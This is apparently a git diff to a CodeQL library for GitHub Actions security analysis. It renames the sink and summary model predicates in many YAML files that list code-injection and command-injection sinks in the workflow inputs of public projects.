index 40549844d385..d45a2e2a03a0 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.test_filter", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index bd180d9b3676..896400bf2f15 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index 1e5721f1e7c5..ade06c90c26b 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index b7a14240aed5..f4c2d488ba37 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 1a276f8812f7..8a11ced42d02 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index ef448c8f4c0d..4c018b20f223 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 6c6721700258..315c85efeb62 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "input.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index b7104a8b6153..8a3132d52582 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index cd81a7239066..9a669c8c009a 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 1b2ce37480f5..0ecb817822c0 100644 
--- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index 91889927c452..e4590eeec8b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 8d4400bd3ead..ea0ddad06978 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml 
@@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 29c7e1bd3e24..9352f766e82d 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index 109dce9df0db..d436644f4acd 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index e3643f0156b2..c6c01abca904 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "input.pull_request_number", "code-injection", "generated"] @@ -9,7 +9,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "output.pull_request_number", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index a4bba59b5a5c..8a9f76e7e52d 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index d12982c35a45..8b3cfebc67b9 100644 
--- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index deb10e5e4b4f..9add4859f35a 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 5c22f0ffcb76..efc8097b963f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 790e94c2aacd..6a305522cfb4 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index fedb21393bc3..441325c76a5f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index f60fffb206e2..5f0831afc073 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index c7fe932aba20..afd7aabc1fce 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index d47aea3363f3..49e556f585f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index f32acf5038ef..24585aa50ed0 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index c739b5750ccb..afc7af28f9b4 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 7ac3c0fb530e..5b3d91a8a7ba 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index c641035f9662..b43253eb619a 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index adea8ae4bd2c..89559cf57e3f 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 857c946e2b78..6292841e56ad 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 717022ea6e83..9f98fd51139d 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index 7dadb99209db..e04605511b89 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index ca3cb0091e90..a77181e6c4eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index 6faf8b900578..6c90e29a43bf 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 39b6773a2b19..6bacbc181daa 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index cbbce950b419..83d438d4e3d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 48206551bcd0..703a766cb4cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index 256ad3f0e042..ecb4c809efe4 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index ae408b131e08..9b02577be7d3 100644 
--- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"] @@ -9,6 +9,6 @@ extensions: - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index c7e2cf41b3f6..1ffc3df1c815 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 781384a2fe19..53ed1840b0a1 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] 
diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml index 9036f199f424..17d2ed2e4735 100644 --- a/ql/lib/ext/go-semantic-release_action.model.yml +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml index 7eee95dbcce4..68c2552c3505 100644 --- a/ql/lib/ext/golangci_golangci-lint-action.model.yml +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml index 4fe9e32ce521..977f6b98ae4b 100644 --- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml index 0352ece87b52..616f7fdb9ca8 100644 --- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml 
